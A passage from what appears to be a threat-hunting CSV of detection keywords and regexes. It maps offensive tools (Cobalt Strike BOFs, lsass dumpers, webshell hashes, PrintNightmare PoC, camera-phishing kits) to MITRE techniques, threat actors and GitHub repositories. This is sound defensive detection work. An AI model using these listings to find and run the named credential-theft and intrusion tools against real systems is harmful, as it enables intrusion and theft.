Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37508"
"*cad7357cebb65176e5ea24ffa0ef75587ea700e50aa4bf0db182e673f458ed76*",".{0,1000}cad7357cebb65176e5ea24ffa0ef75587ea700e50aa4bf0db182e673f458ed76.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37510"
"*cad75780597ec7bda1505580fb4585123eb9685e0b759082d739c037c11e67be*",".{0,1000}cad75780597ec7bda1505580fb4585123eb9685e0b759082d739c037c11e67be.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37511"
"*cae47439ed3f0e93f2a67569bc8beaa43935db88e1e716abe014812c2c2b3725*",".{0,1000}cae47439ed3f0e93f2a67569bc8beaa43935db88e1e716abe014812c2c2b3725.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37513"
"*cae4832509fdd3effd709ed3b7549d2472d9c11ad06121b295d03c6a4699b85c*",".{0,1000}cae4832509fdd3effd709ed3b7549d2472d9c11ad06121b295d03c6a4699b85c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37514"
"*cae8ce4abd220828370284f9cb4b66aeec57aa3d9fdd34a47599b10cead0beab*",".{0,1000}cae8ce4abd220828370284f9cb4b66aeec57aa3d9fdd34a47599b10cead0beab.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37515"
"*caeaaee0273746fee0c2f2e790f3215075a28a8ec6ffc22d18f82e68aea555a2*",".{0,1000}caeaaee0273746fee0c2f2e790f3215075a28a8ec6ffc22d18f82e68aea555a2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37516"
"*caf0940d2bfc54a2efd684ccf47ebddb79da9331584b4781924e260372cca582*",".{0,1000}caf0940d2bfc54a2efd684ccf47ebddb79da9331584b4781924e260372cca582.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37518"
"*caf10b7ae65ee32d8a5fc68bfe5fa8bbe73a3ebd5a9602ebf49ec977edb1e38b*",".{0,1000}caf10b7ae65ee32d8a5fc68bfe5fa8bbe73a3ebd5a9602ebf49ec977edb1e38b.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37519"
"*caf9a055f2ff381b97c14536634a3bda03c79b47402719bfe8145b3285351450*",".{0,1000}caf9a055f2ff381b97c14536634a3bda03c79b47402719bfe8145b3285351450.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","37520"
"*caf9a055f2ff381b97c14536634a3bda03c79b47402719bfe8145b3285351450*",".{0,1000}caf9a055f2ff381b97c14536634a3bda03c79b47402719bfe8145b3285351450.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","37521"
"*cafb5561a99ca3e74b06e53a71967c69d7037985652179031acd7ecc89704200*",".{0,1000}cafb5561a99ca3e74b06e53a71967c69d7037985652179031acd7ecc89704200.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37522"
"*caffix*amass*",".{0,1000}caffix.{0,1000}amass.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1590 - T1591 - T1592 - T1593 - T1594 - T1595","TA0009 - TA0011 - TA0007","N/A","EMBER BEAR","Reconnaissance","https://github.com/OWASP/Amass","1","0","#linux","N/A","5","10","12855","1965","2025-04-21T23:28:45Z","2018-07-10T16:05:08Z","37523"
"*caffix/amass*",".{0,1000}caffix\/amass.{0,1000}","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping. recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","EMBER BEAR","Reconnaissance","https://github.com/OWASP/Amass","1","0","#linux","N/A","5","10","12855","1965","2025-04-21T23:28:45Z","2018-07-10T16:05:08Z","37524"
"*calc.zip /pass:xOVTzio*",".{0,1000}calc\.zip\s\/pass\:xOVTzio.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","37525"
"*calebstewart/bypass-clm*",".{0,1000}calebstewart\/bypass\-clm.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","1","N/A","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","37526"
"*calebstewart/CVE-2021-1675*",".{0,1000}calebstewart\/CVE\-2021\-1675.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/calebstewart/CVE-2021-1675","1","1","N/A","N/A","10","10","1049","230","2021-07-05T08:54:06Z","2021-07-01T23:45:58Z","37527"
"*calebstewart/pwncat*",".{0,1000}calebstewart\/pwncat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","37528"
"*-CalendarNTLMLeak*",".{0,1000}\-CalendarNTLMLeak.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","N/A","4","344","63","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z","37529"
"*Call KaynLoader in a remote thread*",".{0,1000}Call\sKaynLoader\sin\sa\sremote\sthread.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","37530"
"*Call KaynLoader in a remote thread*",".{0,1000}Call\sKaynLoader\sin\sa\sremote\sthread.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","37531"
"*CALLBACK_HASHDUMP*",".{0,1000}CALLBACK_HASHDUMP.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","37532"
"*CALLBACK_KEYSTROKES*",".{0,1000}CALLBACK_KEYSTROKES.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","37533"
"*CALLBACK_NETVIEW*",".{0,1000}CALLBACK_NETVIEW.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","37534"
"*CALLBACK_PORTSCAN*",".{0,1000}CALLBACK_PORTSCAN.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","37535"
"*CALLBACK_TOKEN_STOLEN*",".{0,1000}CALLBACK_TOKEN_STOLEN.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","37536"
"*CallBackDump*dumpXor*",".{0,1000}CallBackDump.{0,1000}dumpXor.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","N/A","10","10","549","76","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z","37537"
"*CallbackDump.exe*",".{0,1000}CallbackDump\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","N/A","10","10","549","76","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z","37538"
"*CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor*",".{0,1000}CallDllMainSC1\/ThisIsNotTheStringYouAreLookingFor.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","37539"
"*calling MySQL shell. To quit type 'x' or 'q' and press ENTER*",".{0,1000}calling\sMySQL\sshell\.\sTo\squit\stype\s\'x\'\sor\s\'q\'\sand\spress\sENTER.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#content","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","37540"
"*CamHacker has a new update!*",".{0,1000}CamHacker\shas\sa\snew\supdate!.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","37541"
"*CamHacker updated successfully*",".{0,1000}CamHacker\supdated\ssuccessfully.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","37542"
"*CamHacker/releases/latest/download/websites.zip*",".{0,1000}CamHacker\/releases\/latest\/download\/websites\.zip.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","N/A","10","","N/A","","","","37543"
"*cam-hackers.py*",".{0,1000}cam\-hackers\.py.{0,1000}","offensive_tool_keyword","Cam-Hackers","Hack Cameras CCTV FREE","T1125","TA0007","N/A","N/A","Discovery","https://github.com/AngelSecurityTeam/Cam-Hackers","1","1","N/A","N/A","6","10","2025","512","2024-08-06T18:49:02Z","2019-11-16T18:49:35Z","37544"
"*Cam-Hackers-master.zip*",".{0,1000}Cam\-Hackers\-master\.zip.{0,1000}","offensive_tool_keyword","Cam-Hackers","Hack Cameras CCTV FREE","T1125","TA0007","N/A","N/A","Discovery","https://github.com/AngelSecurityTeam/Cam-Hackers","1","1","N/A","N/A","6","10","2025","512","2024-08-06T18:49:02Z","2019-11-16T18:49:35Z","37545"
"*can now impersonate users on * via S4U2Proxy*",".{0,1000}can\snow\simpersonate\susers\son\s.{0,1000}\svia\sS4U2Proxy.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","#content","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","37546"
